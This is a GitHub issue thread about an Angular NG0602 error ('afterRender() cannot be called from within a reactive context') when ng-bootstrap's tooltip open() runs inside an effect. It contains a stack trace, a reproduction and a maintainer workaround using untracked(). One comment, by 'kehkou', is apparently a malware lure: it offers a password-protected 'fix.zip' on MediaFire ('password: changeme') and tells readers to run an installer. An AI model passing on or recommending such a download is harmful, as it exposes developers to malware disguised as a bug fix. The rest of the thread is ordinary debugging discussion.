### ISSUE TITLE
NG0602 error: angular:  & ng-bootstrap:17.0.1 

### ISSUE THREAD

**Issue by sysmat** [ng-bootstrap/ng-bootstrap#4751]
### Bug description:

- using viewChild<NgbTooltip>
- using  effect for opening tooltip produce error NG0602

```
Error: NG0602: afterRender() cannot be called from within a reactive context. Call `afterRender` outside of a reactive context. For example, schedule the render callback inside the component constructor`. Find more at https://angular.dev/errors/NG0602
    at assertNotInReactiveContext (core.mjs:18891:11)
    at afterRender (core.mjs:19085:16)
    at ng-bootstrap.mjs:15462:32
    at _ZoneDelegate.invoke (zone.js:369:28)
    at _ZoneImpl.run (zone.js:111:43)
    at _NgZone.runOutsideAngular (core.mjs:6934:24)
    at _NgbTooltip.open (ng-bootstrap.mjs:15450:20)
    at _SourceViewComponent.build_fn (source-view.component.ts:101:11)
    at effect2.allowSignalWrites [as effectFn] (source-view.component.ts:87:11)
    at EffectHandle.runEffect (core.mjs:37274:12)
    at Object.fn (core.mjs:37269:52)
    at Object.run (signals.mjs:507:12)
    at EffectHandle.run (core.mjs:37285:18)
    at ZoneAwareEffectScheduler.flushQueue (core.mjs:37252:14)
    at core.mjs:37242:31
    at _ZoneDelegate.invoke (zone.js:369:28)
    at Object.onInvoke (core.mjs:7038:25)
    at _ZoneDelegate.invoke (zone.js:368:34)
    at _ZoneImpl.run (zone.js:111:43)
    at ZoneAwareEffectScheduler.flush (core.mjs:37242:16)
    at core.mjs:37211:14
    at _ZoneDelegate.invokeTask (zone.js:402:33)
    at core.mjs:6707:49
    at AsyncStackTaggingZoneSpec.onInvokeTask (core.mjs:6707:30)
    at _ZoneDelegate.invokeTask (zone.js:401:38)
    at Object.onInvokeTask (core.mjs:7027:25)
    at _ZoneDelegate.invokeTask (zone.js:401:38)
    at _ZoneImpl.runTask (zone.js:159:47)
    at drainMicroTaskQueue (zone.js:581:35)
```

### Link to minimally-working StackBlitz that reproduces the issue:

```typescript
tip = viewChild<NgbTooltip>('tip');
user = input.required<User>();
constructor() {
    effect(
      () => {
        if (this.user()) {
           this.tip().open();
        }
      },
      { allowSignalWrites: true }
    );
  }
```

### Versions of Angular, ng-bootstrap and Bootstrap:

Angular: 18.2.2

ng-bootstrap: 17.0.1 

Bootstrap: 5.3.3

**Comment by kehkou** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by sysmat** [comment]
it works with Angular: 18.2.1

**Comment by sysmat** [comment]
with afterRender then tooltip it open and close for ever

**Comment by sysmat** [comment]
afterNextRender it looks better, more promesing

**Comment by maxokorokov** [comment]
@sysmat, can you make a reproduction StackBlitz please?

**Comment by sysmat** [comment]
@maxokorokov soon as I have time, I'm in upgrade upgrade cycle

**Comment by sysmat** [comment]
@maxokorokov https://stackblitz.com/edit/stackblitz-starters-yqzmdm?file=demo%2Fsrc%2Fapp%2Fuser.component.ts

1. in terminal go to folder demo
2. pnpm i & pnpm start
3. open browser console and you will see error:  `NG0602: afterRender() cannot be called from within a reactive context.`

al the logic is in **user.component.ts**

**Comment by maxokorokov** [comment]
Ok, here is a better reproduction:

https://stackblitz.com/edit/angular-vtvzfl-ywakx8?file=src%2Fapp%2Ftooltip-basic.ts,src%2Fapp%2Ftooltip-basic.html

Basically calling `.open()` calls the `afterRender()` to recalculate tooltip positioning.

**Comment by sysmat** [comment]
@maxokorokov ok, thx

**Comment by maxokorokov** [comment]
Workaround being wrapping opening call in `untracked()` I guess:

```ts

effect(() => {
  untracked(() => tooltip.open());
});

```

But we should fix it internally of course.

**Comment by sysmat** [comment]
@maxokorokov yes I need to use untracked , because then in tests I have `NG0950: Input is required but no value is available yet.`

**Comment by sysmat** [comment]
any progress?

**Comment by sysmat** [comment]
is afterRender mor for ssr?

**Comment by JordanCleeve** [comment]
Also saw this error calling .open on a dropdown
